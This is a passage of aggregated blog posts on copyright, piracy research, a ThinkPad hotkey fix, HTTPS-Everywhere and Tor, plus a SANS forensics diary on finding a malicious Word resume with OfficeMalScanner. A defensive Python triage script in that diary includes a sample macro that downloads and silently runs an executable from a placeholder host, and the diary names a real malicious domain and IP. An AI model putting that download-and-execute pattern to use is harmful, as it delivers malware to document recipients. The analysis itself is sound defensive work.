“The primary goal of this policy is to force copyright holders to release their content globally, without geographical restrictions. If a TV-show is not available in New Zealand for three months after the U.S. release, there should be no enforcement during this period,” Dotcom tells us.

“Content owners should be held responsible, not the public. The ‘geo blocking’ proposal forces Hollywood to change its business model and release its content worldwide without delays,” he adds.

Dotcom hopes that the Internet Party proposal will serve as model for future copyright law that will eventually be adopted around the world.

[Image: Hulu’s Geo Blocking]

Internet Party leader Laila Harré notes that the current situation is unmanageable. The Internet has made it possible to release content worldwide without any delays, but content owners refuse to give consumers what they want.

“A Kiwi who wants to watch the latest season of first run TV shows like Game of Thrones, for example, shouldn’t be forced to jump through hoops to access what should be legally and easily available online. It’s a ridiculous situation in this day and age,” Harré notes.

Thus far, however, most movement has been in the opposite direction. In an attempt to crack down on people who bypass geo restrictions, Hulu recently started to ban all visitors who use a VPN connection.

Instead of fighting circumvention, the Internet Party believes that copyright holders should address the root of the problem themselves. Making sure that the latest TV-shows can be watched legally is a must, and although some progress has been made over the years, the legal options are still lacking.

“Some excellent work has been done by some copyright owners and content providers to make good legal options available to New Zealanders. But there’s still a long way to go, especially for some types of content such as globally popular first run television shows broadcast overseas but not available in New Zealand for weeks or months, if at all,” Harré says.

Aside from geo blocking issues, the Internet Party also wants to abolish the Internet disconnection sanction available under New Zealand’s “three-strikes” law, and strengthen the “safe harbor” provisions for Internet services to prevent abuse by copyright holders.

The full draft of the Internet Party’s copyright and open research policy is available here.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

SANS Internet Storm Center, InfoCON: green: OfficeMalScanner helps identify the source of a compromise, (Sun, Jun 22nd)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

While working a recent forensics case I had the opportunity to spread the proverbial wings a bit and utilize a few tools I had not used before.

In the midst of building my forensic timeline I set out to determine the initial attack vector, operating on the assumption that it was either web-based content (a malicious ad or a site compromised with a web exploit kit) or a malicious link or document attachment delivered via email. One interesting variable stood out while reviewing the victim’s PST file. Her company was in the midst of hiring, seeking candidates for a few positions, and was receiving numerous emails with resume attachments, both PDF and DOC/DOCX. I had already discovered the primary malware compromise of the victim’s system, so I simply needed to see, based on time stamps, whether a malicious email had arrived prior to it. One particular email with a Word doc attached stood right out, as it arrived at 12:23am on the same day as the malware compromise later at noon. Antimalware detection immediately identified the attachment as TrojanDownloader:W97M/Ledod.A. This alleged resume attachment was also for a John Cena, which cracked me up as I am indeed familiar with the WWE professional wrestler of the same name. Unfortunately, technical details for W97M/Ledod.A were weak at best, and all I had to go on initially was “this trojan can download and run other malware or potentially unwanted software onto your PC.” Yeah, thanks for that. What is a poor forensicator to do?

Frank Boldewin’s (Reconstructer.org) OfficeMalScanner to the rescue! This tool works like a charm when you want a quick method to scan for shellcode and encrypted PE files, as well as to pull macro details from nasty Office documents. As always, when you choose to interact with mayhem, it’s best to do so in an isolated environment; I run OfficeMalScanner on a Windows 7 virtual machine. If you just run OfficeMalScanner without defining any parameters, it kindly dumps its options for you, as seen in Figure 1.

OfficeMalScanner options

Figure 1

For this particular sample, when I ran OfficeMalScanner.exe "John Cena Resume.doc" scan the result “No malicious traces found in this file!” was returned. As the tool advised me to do, I ran OfficeMalScanner.exe "John Cena Resume.doc" info as well and struck pay dirt as seen in Figure 2.

OfficeMalScanner finds macros code

Figure 2

When I opened ThisDocument from C:\tools\OfficeMalScanner\JOHN CENA RESUME.DOC-Macros I was treated to the URL and executable payload I was hoping for as seen in Figure 3.

OfficeMalScanner results

Figure 3

A little virustotal.com and urlquery.net research on dodevelopments.com told me everything I needed to know: pure Lithuanian evil in the form of IP address 5.199.165.239. A bit of trekking through all the malicious EXEs known to be associated with that IP address and voilà, I had my source.
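As an added example (not OfficeMalScanner’s code, nor the diary author’s), here is the follow-up step after the info run: a small Python triage script that reads a dumped VBA module such as ThisDocument, folds simple Chr() string concatenation, and reports auto-exec entry points, download/execute calls and embedded URLs. The sample macro, its URL and file name are constructed placeholders.

```python
"""Triage an extracted VBA module for macro-downloader indicators.

OfficeMalScanner's ``info`` mode writes each macro module (e.g. ThisDocument)
to a text file; this added example (not OfficeMalScanner's or the diary
author's code) reads such a dump and reports what an analyst wants to know:
auto-execute entry points, download/execute API use and embedded URLs, after
folding simple Chr()-concatenation string obfuscation.
"""
import re
from dataclasses import dataclass, field

# Procedures Word/Excel run automatically when a document opens or closes.
AUTOEXEC = ("AutoOpen", "Document_Open", "AutoExec", "AutoClose",
            "Document_Close", "Workbook_Open", "Auto_Open")
# Calls typical of a macro downloader: fetch a file, then run it.
DOWNLOAD = ("URLDownloadToFile", "MSXML2.XMLHTTP", "ADODB.Stream")
EXECUTE = ("Shell", "WScript.Shell", "Win32_Process")
OTHER = ("CreateObject", "Environ", "Kill")

_CHR = re.compile(r"\bChr\$?\(\s*(\d+)\s*\)", re.I)
_CONCAT = re.compile(r'"([^"]*)"\s*&\s*"([^"]*)"')
_URL = re.compile(r"https?://[^\s\"'&<>()]+", re.I)


def fold_strings(src: str) -> str:
    """Rewrite Chr(n) calls as literals and merge "a" & "b" into "ab".

    Only printable, non-quote characters are folded; anything else is left
    untouched so the source stays readable.
    """
    def chr_literal(m):
        code = int(m.group(1))
        if 32 <= code < 127 and chr(code) != '"':
            return f'"{chr(code)}"'
        return m.group(0)

    folded = _CHR.sub(chr_literal, src)
    while True:  # repeat until no adjacent literal pair is left to merge
        merged = _CONCAT.sub(lambda m: f'"{m.group(1)}{m.group(2)}"', folded)
        if merged == folded:
            return merged
        folded = merged


@dataclass
class MacroReport:
    autoexec: list = field(default_factory=list)
    suspicious: list = field(default_factory=list)
    urls: list = field(default_factory=list)
    verdict: str = "low"


def triage_vba(src: str) -> MacroReport:
    """Score a VBA module: 'high' = runs on open and downloads + executes."""
    report = MacroReport()
    folded = fold_strings(src)
    for name in AUTOEXEC:  # VBA identifiers are case-insensitive
        if re.search(rf"\b(?:Sub|Function)\s+{name}\b", folded, re.I):
            report.autoexec.append(name)
    for name in DOWNLOAD + EXECUTE + OTHER:
        if re.search(r"\b" + re.escape(name) + r"\b", folded, re.I):
            report.suspicious.append(name)
    report.urls = sorted(set(_URL.findall(folded)))
    downloads = any(n in report.suspicious for n in DOWNLOAD)
    executes = any(n in report.suspicious for n in EXECUTE)
    if report.autoexec and downloads and executes:
        report.verdict = "high"
    elif report.autoexec or report.suspicious:
        report.verdict = "medium"
    return report


# Constructed sample in the style of a macro downloader; placeholder URL.
SAMPLE_VBA = '''Attribute VB_Name = "ThisDocument"
Private Sub Document_Open()
    Dim u As String, p As String
    u = "http://example.invalid/" & Chr(114) & Chr(101) & Chr(115) & "ume.exe"
    p = Environ("TEMP") & "\\resume.exe"
    URLDownloadToFile 0, u, p, 0, 0
    Shell p, vbHide
End Sub
'''

if __name__ == "__main__":
    r = triage_vba(SAMPLE_VBA)
    print(f"verdict={r.verdict} autoexec={r.autoexec}")
    print(f"suspicious={r.suspicious} urls={r.urls}")
```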

See Jared Greenhill’s writeup on these same concepts at EMC’s RSA Security Analytics Blog and our own Lenny Zeltser’s Analyzing Malicious Documents Cheat Sheet where I first learned about OfficeMalScanner. Prior related diaries also include Decoding Common XOR Obfuscation in Malicious Code and Analyzing Malicious RTF Files Using OfficeMalScanner’s RTFScan (Lenny is El Jefe).

I hope to see some of you at SANSFIRE 2014. I’ll be there for the Monday evening State of the Internet Panel Discussion at 7:15 and will present C3CM Defeating the Command, Control, and Communications of Digital Assailants on Tuesday evening at 8:15.

Russ McRee | @holisticinfosec

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

TorrentFreak: Digital Content Online Should Be Free, Children Say

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

The results of a new survey commissioned by YouGov SixthSense on the file-sharing and content consumption habits of citizens in the UK have just been published.

Among broader issues, the study, which draws on a sample of 1,907 adults over 16 years old and 614 children aged between 8 and 15, looked at reasons why people use file-sharing sites, plus attitudes towards piracy and paying for content.

Online content should be free

The headline finding presented by YouGov suggests that half of the up-and-coming generation believes that the Internet should be a content free-for-all. A total of 49% of the 8 to 15-year-olds questioned said that they believe that people should be able to download the content they want from the Internet for nothing.

Drilling down specifically into attitudes towards file-sharing sites, 6% of children said that using them is easy, with 7% agreeing that it had become the normal thing to do.

Interestingly, YouGov found that when questioning the 16-year-old and above group, the attitudes towards free content were the same, with an identical 49% stating that online content should be free to download.

Motivations to share files

The survey found that the major driver for use of file-sharing sites is cost. While adults tend to have the most disposable income, 51% said that they use file-sharing sites to save money.

Among the children, whose resources are often more limited, 44% said their motivation was financial, with a quarter of 16-24 year olds reporting that file-sharing is the only way they can afford to access content online.

Unsurprisingly, the issue of accessibility came in at a close second place for both groups. The speed and convenience of file-sharing was cited as a key motivator for use by 41% of adults and 38% of the children.

Attitudes towards piracy and sanctions

The mainstream entertainment companies invariably insist that downloading movies and music without permission is tantamount to stealing. However, when it comes to the UK’s children the survey suggests that Big Entertainment has a mountain to climb to have that notion widely adopted. While 16% of children accept that it’s wrong to obtain content for free without the creator’s permission, just 7% believe that file-sharing is a form of stealing.

When it comes to punishing someone, somewhere, for the piracy problem, it comes as little surprise that most of the adults feel that the blame should be placed elsewhere. Rather than being punished for illegal downloading themselves, 60% of the 16-24 year-olds said that the companies and websites providing the content should be punished instead.

The future

Despite the favorable cost and convenience of using unauthorized sources, YouGov notes that opportunities exist for content providers to address those issues. Legal alternatives, such as the free ad-supported model offered by Spotify, are being utilized more, and there are signs that people are happy to pay for exclusive content. Among the children, for example, 13% said they would spend their money if that meant supporting an up-and-coming artist.

“Children in this generation have grown up with digital material and are used to having access to what they want, when they want it and for some of the time not paying for it,” says YouGov Research Director James McCoy.

“Whilst they appreciate the issues surrounding piracy and illegal downloads, if they can get away with it, then they will. Why change the habit of a lifetime?”

McCoy says that the challenge for industry moving forward is to find ways to engage and educate this group “in a relevant and non-condescending way.” That can probably be done, it just might take a little while yet.

The Future of Digital Consumption 2014 can be purchased from YouGov.


TorrentFreak: MPAA Offers $20,000 Grants For “Unbiased” Piracy Research

This post was syndicated from: TorrentFreak and was written by: Ernesto. Original post: at TorrentFreak

Late last year a study from European researchers revealed that the Megaupload shutdown had a negative effect on the box office revenues of smaller films.

The researchers suggested that the decrease in sales may be the result of a drop in word-of-mouth promotion from pirates, which affects smaller movies more since they have less advertising budget.

The MPAA wasn’t happy with the media coverage the study generated and went on the defensive citing two Carnegie Mellon University studies to show that piracy harms sales.

Interestingly, it failed to disclose that those findings came from research that was supported by a $100,000 grant from the MPAA.

While we trust that the research is solid, the above shows that academic research plays an important role in the MPAA’s lobbying efforts. For this reason, the Hollywood group has recently started a grants program, hoping to enlist more academics to conduct copyright-related research.

The MPAA is now accepting research proposals on a series of predefined topics. They include the impact of copyright law on innovation and the effectiveness of DMCA takedown notices. The best applications will be awarded a $20,000 grant.

“We want to enlist the help of academics from around the world to provide new insight on a range of issues facing the content industry in the digital age,” says MPAA CEO and former U.S. Senator Chris Dodd.

According to the MPAA boss, academic researchers can contribute to understanding the changes the industry faces by providing unbiased insights.

“We need more and better research regarding the evolving role of copyright in society. The academic community can provide unbiased observations, data analysis, historical context and important revelations about how these changes are impacting the film industry and other IP-reliant sectors,” Dodd notes.

The MPAA clearly sees academic research as an important tool in their efforts to ensure that copyright protections remain in place, or are strengthened if needed.

This outreach to academics may in part be fueled by what their ‘opponents’ are doing. Google, for example, is heavily supporting academic research on copyright-related projects in part to further their own interests.

Both sides clearly steer researchers by giving them precise directions on the grounds they want covered. It’s now up to the academics to make sure that they don’t become pawns in a much bigger fight, and that their research is conducted and results presented in an objective manner.


Schneier on Security: Paying People to Infect their Computers

This post was syndicated from: Schneier on Security and was written by: schneier. Original post: at Schneier on Security

Research paper: “It’s All About The Benjamins: An empirical study on incentivizing users to ignore security advice,” by Nicolas Christin, Serge Egelman, Timothy Vidas, and Jens Grossklags.

Abstract: We examine the cost for an attacker to pay users to execute arbitrary code — potentially malware. We asked users at home to download and run an executable we wrote without being told what it did and without any way of knowing it was harmless. Each week, we increased the payment amount. Our goal was to examine whether users would ignore common security advice — not to run untrusted executables — if there was a direct incentive, and how much this incentive would need to be. We observed that for payments as low as $0.01, 22% of the people who viewed the task ultimately ran our executable. Once increased to $1.00, this proportion increased to 43%. We show that as the price increased, more and more users who understood the risks ultimately ran the code. We conclude that users are generally unopposed to running programs of unknown provenance, so long as their incentives exceed their inconvenience.

The experiment was run on Mechanical Turk, which means we don’t know who these people were or even if they were sitting at computers they owned (as opposed to, say, computers at an Internet cafe somewhere). But if you want to build a fair-trade botnet, this is a reasonable way to go about it.

Two articles.

Bradley M. Kuhn's Blog ( bkuhn ): Resolving Weirdness In Thinkpad T60 Hotkeys

This post was syndicated from: Bradley M. Kuhn's Blog ( bkuhn ) and was written by: Bradley M. Kuhn. Original post: at Bradley M. Kuhn's Blog ( bkuhn )

In keeping with my tendency to write a blog post about any technical issue
I find that takes me more than five minutes to figure out when searching
the Internet, I include below a resolution to a problem that took me,
embarrassingly, nearly two and half hours across two different tries to
figure out.

The problem appeared when I took the Debian 7 (wheezy) hard drive out
of the Lenovo Thinkpad T61 I had been using, which had failed, and put it
into a Lenovo Thinkpad T60. (I’ve been trying to switch fully to the T60 for
everything because it is supported by Coreboot.)

[Image: a Lenovo T60 Thinkpad keyboard with the volume buttons circled in purple.]

When I switched, everything was working fine, except the volume buttons on
the Thinkpad T60 (those three buttons in the top left hand corner of the
keyboard, shown circled in purple in the image on the right) no longer did
what I expected. I expected they would ultimately control PulseAudio volume,
which does the equivalent of pactl set-sink-mute 0 0 and
appropriate pactl set-sink-volume 0 commands for my sound card.
I noticed this because when PulseAudio is running, and you type those
commands on the command line, all functions properly with the
volume, and, when running under X, I see the popup windows coming
from my desktop environment showing the volume changes. So, I knew nothing
was wrong with the sound configuration when I switched the hard drive to a
new machine, since the command line tools worked and did the right things.
Somehow, the buttons weren’t sending the same commands in whatever manner
they were used to.

I assumed at first that the buttons simply generated X events. It turns
out they do once everything is working, but the story there is a bit more
complex. When I ran xev I saw those buttons did not, in fact, generate any X
events. So, that made it clear that nothing from X windows
“up” (i.e., to the desktop software) had anything to do with the
situation.

So, I first proceeded to research whether these volume keys were supposed to
generate X events. I discovered that there were indeed XF86VolumeUp,
XF86VolumeDown and XF86VolumeMute key events (I’d seen those before, in
fact, doing similar research years ago). However, the advice online was
highly conflicting about whether the best way to solve this is to have
them generate X events. Most of the discussions I found assumed the keys
were already generating X events and had advice about how to bind those
keys to scripts or to your desktop setup of
choice [0].

I found various old documentation about the thinkpad_acpi
daemon, which I quickly found was out of date, since long ago it had been
incorporated into Linux’s ACPI support directly and no longer required
additional daemons. This led me to just begin poking around in how the
ACPI subsystem handles ACPI keys.

I quickly found the xev equivalent for
acpi: acpi_listen. This was the breakthrough I needed to
solve this problem. I ran acpi_listen and discovered that
while other Thinkpad key sequences, such as Fn-Home (to
increase brightness), generated output like:

video/brightnessup BRTUP 00000086 00000000 K
video/brightnessup BRTUP 00000086 00000000

but the volume up, down, and mute keys generated no output at all. Therefore,
it’s pretty clear at this point that the problem is something related to the
configuration of ACPI in some way. I had a feeling this would be hard to
find a solution for.

That’s when I started poking around in /proc, and found
that /proc/acpi/ibm/volume was changing each time I
hit these keys. So, Linux clearly was receiving notice that these keys
were pressed. So, why wasn’t the acpi subsystem notifying anything else,
including whatever interface acpi_listen talks to?

Well, this was a hard one to find an answer to. I have to admit that I
found the answer through pure serendipity. I had already
loaded this old bug report for a GNU/Linux distribution waning in
popularity and found that someone resolved the ticket with the command:

cp /sys/devices/platform/thinkpad_acpi/hotkey_all_mask /sys/devices/platform/thinkpad_acpi/hotkey_mask


This command:

# cat /sys/devices/platform/thinkpad_acpi/hotkey_all_mask /sys/devices/platform/thinkpad_acpi/hotkey_mask 
0x00ffffff
0x008dffff


quickly showed that the masks didn’t match. So I did:

# cat /sys/devices/platform/thinkpad_acpi/hotkey_all_mask > /sys/devices/platform/thinkpad_acpi/hotkey_mask 


and that single change caused the buttons to work again as expected,
including causing the popup notifications of volume changes and the like.

Additional searching showed this hotkey issue is documented in Linux’s
Thinkpad ACPI documentation, which states:

The hot key bit mask allows some control over which hot keys generate events.
If a key is “masked” (bit set to 0 in the mask), the firmware will handle it.
If it is “unmasked”, it signals the firmware that thinkpad-acpi would prefer
to handle it, if the firmware would be so kind to allow it (and it often
doesn’t!).

I note that on my system, running the command the document recommends to
reset to defaults yields me back to the wrong state:

# cat /proc/acpi/ibm/hotkey 
status:         enabled
mask:           0x00ffffff
commands:       enable, disable, reset, <mask>
# echo reset > /proc/acpi/ibm/hotkey 
# cat /proc/acpi/ibm/hotkey 
status:         enabled
mask:           0x008dffff
commands:       enable, disable, reset, <mask>
# echo 0xffffffff > /proc/acpi/ibm/hotkey

So, I added that last command above to re-enable Linux’s control
of all the ACPI hot keys, which I suspect is what I want. I’ll update the
post if doing that causes other problems that I hadn’t seen before. I’ll
also update the post to note whether this setting is saved over reboots, as
I haven’t rebooted the machine since I did this. :)


[0] Interestingly, as has
happened to me often recently, much of the most useful information that I
find about any complex topic regarding how things work in modern GNU/Linux
distributions is found on the Arch or Crunchbang online fora and wikis. It’s
quite interesting to me that these two distributions appear to be the primary
place where the types of information that every distribution once needed to
provide are kept. Their wikis are becoming the canonical references of how a
distribution is constructed, since much of the information found therein
applies to all distributions, but distributions like Fedora and Debian
attempt to make it less complex for the users to change the
configuration.

TorrentFreak: Piracy Takedown Notices Increase E-Book Sales, Research Finds

This post was syndicated from: TorrentFreak and was written by: Ernesto. Original post: at TorrentFreak

In an attempt to limit the availability of pirated content, copyright holders send millions of takedown requests to online services every week.

The effectiveness of these anti-piracy measures is often in doubt, since the pirated files usually reappear quickly elsewhere. But, according to new research they do have some effect.

Imke Reimers, an economics researcher affiliated with NBER and Northeastern University, examined the effectiveness of these takedown notices on book sales. The results, published in the working paper “The Effect of Piracy Protection in Book Publishing,” show that e-book sales increase as a result of the takedown efforts.

In her research Reimers compares sales of book titles before and after takedown notices are issued, to see the effect on book sales across different titles, genres and formats. The study is the first of its kind and reaches the conclusion that piracy protection increases e-book sales.

“This paper is the first to empirically analyze the interaction of online piracy and the legal market for books. It finds that piracy protection significantly increases regular unit sales of e-books, while the effect on physical formats is not as clear,” Reimers writes.

“E-books, the closest substitute for online piracy, benefit from piracy protection by selling 15.4% more units, while there is no significant effect on other formats,” she adds.

A 15 percent increase in e-book sales is quite significant, and translates to millions of dollars in revenue across the industry. For other book formats, including hardcovers, paperback and audiobooks, no sales increase was observed.

The research controlled for a wide variety of third-party variables that could have influenced the results. Based on the current data Reimers is confident that the sales increase can indeed be attributed to the takedown notices. However, she also spots differences in the impact on established and starting writers.

More specifically, piracy doesn’t appear to pose a threat to the e-book sales of starting authors and could even serve as a promotional tool.

“The effect varies by the title’s level of popularity. For well-known books and those by popular authors, online piracy mainly poses a threat to regular book sales, while authors who are just starting out could benefit from the additional platform. My results support this idea, at least for e-books,” Reimers writes.

TorrentFreak reached out to Reimers who notes that it might be a good idea for some authors to share some of their work online.

“I find no evidence that piracy protection is ‘bad’ for any books, but it seems that more obscure titles could benefit from the advertising effect of pirated versions. Some emerging authors offer their titles or excerpts of their titles for free on their websites – exactly to advertise their works. My results suggest that this might be a smart move,” she tells us.

The research is based on data from Digimarc, one of the leading piracy protection firms for the book industry. Needless to say, the company is happy to hear that their efforts indeed appear to have an effect.

“This new research strongly validates our position that Digimarc Guardian’s anti-piracy strategies provide a substantial return-on-investment for customers, in the form of increased legitimate sales and revenue,” Chris Shepard, Director of Product Management at Digimarc, informs us.

Digimarc assured TorrentFreak that they had no hand in the academic research other than providing the piracy takedown data.

The sales data used for the research comes from the leading independent e-book publisher RosettaBooks. Needless to say, they are also happy with the results.

“Rightsholders feel exposed or taken advantage of by piracy. We believe that Digimarc’s services improve our overall sales and the effect of dampened piracy greatly exceeds the cost of the service,” Greg Freed, eBook Production and Distribution Director at RosettaBooks tells TorrentFreak.

While the research indicates that takedown notices can have a positive effect on e-book sales, future research will have to show whether or not this can be generalized to other industries, including the movie and music business.

In any case, with the above in mind it’s expected that the volume of takedown notices will only increase in the near future, a trend that has been going on for several years now.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

The Hacker Factor Blog: EFF’ing Up

This post was syndicated from: The Hacker Factor Blog and was written by: The Hacker Factor Blog. Original post: at The Hacker Factor Blog

The Electronic Frontier Foundation (EFF) is a very important organization to those of us who care about technology, security, and privacy. I primarily know about their legal efforts — protecting free speech, fair use, and civil rights. If you’re a security researcher, then you know that at any moment some big corporation may choose to sue you for reporting an exploit rather than addressing their vulnerabilities. Apple has sued security researchers. Microsoft used to threaten to sue (and left open the potential to do it again). Epic Games, Cisco, and many other big companies have tried to sue people who report vulnerabilities. When this happens, we inevitably run to the EFF for assistance and guidance.

The EFF usually has a very visible position at most big security conferences and they are well-known in the security community. While I rarely donate to any organizations, I have donated to the EFF because they are needed and they do very good work.

Well… they usually do good work…

Oh, so close!

Beyond their legal actions, exposés, and topical news reports, they also provide a cute web plug-in, developed in collaboration with the Tor Project, called “HTTPS-Everywhere”. The idea is that it forces your web browser to use HTTPS rather than HTTP.

I have previously mentioned many of the limitations with HTTPS: it doesn’t reliably validate connections, it permits the human to bypass detected security risks, it is vulnerable to man-in-the-middle connection hijacking, and that little lock symbol really doesn’t mean you are secure.

As security goes, HTTPS is “better than nothing” security. Treat it like that little lock on your front door — it stops someone from easily opening the door. But it doesn’t stop someone from picking the lock, kicking in the door, listening to you through the door, or climbing in the open window next to the door.

Before Google forced everyone to use HTTPS, they offered both HTTP and HTTPS for accessing google.com. Using this plug-in, it would send you to HTTPS rather than HTTP. The same goes for eBay, PayPal, and many other sites. Lots of sites offer both HTTP and HTTPS, but few sites force you to use HTTPS when HTTP is available. In effect, this plug-in forces you to use security-by-placebo rather than no security at all.

My current irk with HTTPS-Everywhere is that the developers do not seem to be testing their code before releasing it. I recently learned that they have a rule file named Hacker-Factor.xml. This rule forces users who access my FotoForensics site to use HTTPS instead of HTTP. This is a big problem.

While FotoForensics does run both HTTP and HTTPS servers, these two interfaces do not provide the same services. “HTTP” is for the public. As clearly specified in the FAQ, the public service is public. It is not private, it offers no privacy, it is explicitly a research site, and it does not offer logins to the public.

In contrast, my HTTPS server demands a login. You won’t get to the upload page or any of the other features without login credentials. (Logins to that server are strictly limited to administrators and research partners.) With my server, you need HTTPS to access the login interface.

Forcing the Point

There is no rule that says the HTTP and HTTPS servers must provide the same content. In fact, many sites today are like mine: HTTP is for the public, and HTTPS is for users who need to log in. Today, I cannot log in to my bank’s web site without using HTTPS. With HTTP, I see their site, but I must switch to HTTPS to see the login. I cannot log in to Google or Twitter or Facebook without HTTPS. Even most news sites use HTTP for public content, but you must use HTTPS if you want to log in. It is not uncommon to see very different content when using HTTPS instead of HTTP.

By forcing users to the HTTPS service at FotoForensics, HTTPS-Everywhere prevents people from using FotoForensics. Moreover, I know that I’m not the only web service out there that uses HTTP for public information and HTTPS for private access.

(I should point out that Buzzfeed.com forces users to HTTP. HTTPS at cnn.com doesn’t work. Reddit.com still uses HTTP, even for logins. And pay.reddit.com displays very different content depending on whether you use HTTP or HTTPS.)

As far as I can tell, someone associated with HTTPS-Everywhere did do a little testing with their Hacker-Factor.xml rules. They noted in their configuration file that I use a self-signed certificate. A self-signed certificate is typically considered “bad”. Except that I also use client-side certificates, which is much stronger security than third-party authentication without client-side certificates. (Also, I don’t see any point in paying a third-party certificate provider for a certificate that isn’t secure.) In effect, I have two-part authentication: something you have (the client-side certificate) and something you know (login credentials). While the EFF noticed my self-signed cert, they did not notice that they couldn’t use the HTTPS site!

I noticed this today when a user complained, so I filled out a trouble ticket, letting them know that the configuration for my site was incorrect. (The “reported by: cypherpunks” is their generic account for people who do not want to register a login with their trouble-ticket service.) They closed it out shortly after, with no change and the comment, “it won’t prohibit the vast majority of people from visiting the site.” I guess they missed the part that prohibiting ANYONE from accessing my site is a flaw in their rule-set!
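To make the failure mode concrete, here is an added example (not code from the EFF extension or from Hacker Factor): a minimal engine for HTTPS-Everywhere-style rulesets plus the one check the rule above needed before release, namely "does any URL that only the HTTP server serves get rewritten?". The element names follow the extension's public XML format, but both rulesets, the sample URLs and the login/admin paths are constructed for illustration and are not the real Hacker-Factor.xml.

```python
"""Minimal HTTPS Everywhere-style ruleset engine with a breakage check.

Added example; this is not code from the EFF extension or from Hacker Factor.
The ruleset elements used (<ruleset>, <target host>, <exclusion pattern>,
<rule from to>) follow the extension's public XML format, but both rulesets
below are constructed for illustration and are not the real Hacker-Factor.xml.
"""
import re
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

# Constructed: the shape of a rule that breaks a site whose HTTP side is
# public and whose HTTPS side only serves a login.
NAIVE_RULESET = r"""
<ruleset name="Hacker Factor (constructed)">
  <target host="fotoforensics.com"/>
  <target host="www.fotoforensics.com"/>
  <rule from="^http:" to="https:"/>
</ruleset>
"""

# Constructed: same targets, but an exclusion keeps every path except the
# (assumed) login and admin paths on HTTP, so the rewrite only fires where
# the HTTPS server actually answers.
SCOPED_RULESET = r"""
<ruleset name="Hacker Factor (constructed, scoped)">
  <target host="fotoforensics.com"/>
  <target host="www.fotoforensics.com"/>
  <exclusion pattern="^http://(www\.)?fotoforensics\.com/(?!login|admin/)"/>
  <rule from="^http:" to="https:"/>
</ruleset>
"""


def load_ruleset(xml_text: str) -> dict:
    """Parse a ruleset into compiled patterns; '$1' in 'to' becomes a backreference."""
    root = ET.fromstring(xml_text)
    return {
        "name": root.get("name"),
        "targets": [t.get("host") for t in root.findall("target")],
        "exclusions": [re.compile(e.get("pattern")) for e in root.findall("exclusion")],
        "rules": [(re.compile(r.get("from")), r.get("to").replace("$", "\\"))
                  for r in root.findall("rule")],
    }


def host_matches(host: str, target: str) -> bool:
    """'*.example.com' is treated here as 'any subdomain of example.com'."""
    if target.startswith("*."):
        return host.endswith(target[1:])
    return host == target


def rewrite(url: str, ruleset: dict) -> str:
    """Return the URL the extension would load: unchanged unless a rule applies."""
    host = urlsplit(url).hostname or ""
    if not any(host_matches(host, t) for t in ruleset["targets"]):
        return url
    if any(e.search(url) for e in ruleset["exclusions"]):
        return url
    for pattern, repl in ruleset["rules"]:
        if pattern.search(url):
            return pattern.sub(repl, url, count=1)
    return url


def apply_all(urls, xml_text: str) -> dict:
    """Map every URL to what the ruleset would turn it into."""
    rs = load_ruleset(xml_text)
    return {u: rewrite(u, rs) for u in urls}


def public_urls_broken(public_only_urls, xml_text: str) -> list:
    """The pre-release test the rule needed: URLs served only over HTTP that
    the ruleset would nevertheless send to HTTPS. Each one is a broken page."""
    rs = load_ruleset(xml_text)
    return sorted(u for u in public_only_urls if rewrite(u, rs) != u)


# Constructed sample: two public (HTTP-only) pages, two login-side paths, a bystander.
SAMPLE_URLS = [
    "http://fotoforensics.com/",
    "http://fotoforensics.com/analysis.php?id=123",
    "http://fotoforensics.com/login",
    "http://www.fotoforensics.com/admin/users",
    "http://example.org/",
]
PUBLIC_ONLY = SAMPLE_URLS[:2]

if __name__ == "__main__":
    for name, rs in (("naive", NAIVE_RULESET), ("scoped", SCOPED_RULESET)):
        print(name, "breaks:", public_urls_broken(PUBLIC_ONLY, rs))
```

Run against the constructed URLs, the naive ruleset rewrites the public front page and the analysis page to HTTPS, which is exactly the breakage described above; the scoped ruleset leaves them alone and only upgrades the login and admin paths. The same check, fed with a crawl of a site's HTTP-only URLs, is what a ruleset should pass before it ships.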

Bad Advice

The other thing that got me looking at the EFF was a tweet they made today:

One year after the first Snowden disclosure, we need a web that resists NSA spying. Fight back. Run a Tor relay. https://eff.org/tor

Wow… does the EFF really not understand what Tor does?

The folks at the Tor Project have a wonderful description of their process. Tor routes your traffic through a circuit of relays between your computer and the remote system you are accessing, with a separate layer of encryption for each relay. Let’s assume that there is someone who can watch all network traffic. What will they be able to tell about your online activities?

  • They will see that your computer is connecting to a Tor server. But they won’t know what you are doing. The data between you and the Tor server is encrypted.
  • The Tor network is like a giant mixer. One node passes to another node passes to another node… And since everyone is getting mixed up, someone watching the network traffic will see you and lots of other people (and other Tor nodes) all connect to the same Tor nodes, but they won’t know which continuing traffic belongs to you. Your trail vanishes into anonymity.
  • Eventually your traffic will reach an “exit node”. This is where it leaves the Tor network and connects to your desired server. The observer sees lots of exit nodes and lots of exit traffic; they don’t know which one belongs to you.

In this regard, Tor offers great security: an observer can see you enter, but doesn’t know what you sent or where you went. They can see lots of people exiting the Tor network, but they cannot identify which exit request is yours. It’s like being pursued by bloodhounds, getting into a car, and driving into rush-hour traffic: the dogs will lose your scent. (One caveat: an observer who truly sees all traffic, at both your entry point and the exit, can match the timing and volume of what goes in against what comes out. Tor’s design does not claim to resist that kind of end-to-end correlation; the picture above holds for an observer who sees only part of the network.)

(For you deep-security folks, I’m ignoring potential connection leaks via applications that do not use Tor for DNS, or other things you run that do not pass through the Tor tunnel.)

Insecure-Tor

If your path is secure, then that means you are secure, right? Well, no.

Eventually your network traffic must exit the Tor network. At that point, it’s just as secure as connecting directly. If you connect to your bank or your Reddit account, then someone watching the traffic will see your login credentials used at that service. The omnipotent observer will see you connect to Tor “going somewhere” and your credentials being used to check your email at Yahoo. At this point, they don’t need a high IQ to know it is you. (It’s like catching a bank robber who fled the scene after being identified. The cops won’t go chasing you. They’ll just send someone over to watch your house — you’re bound to go home sometime…)

Last January, there was a report about some evil Tor exit nodes. Remember: the exit nodes can watch you leave the system and they can explicitly see where you are going. According to the report, some Swedish researchers managed to find “at least 22 corrupt exit nodes that were tampering with encrypted traffic leaving the supposedly private Tor network.”

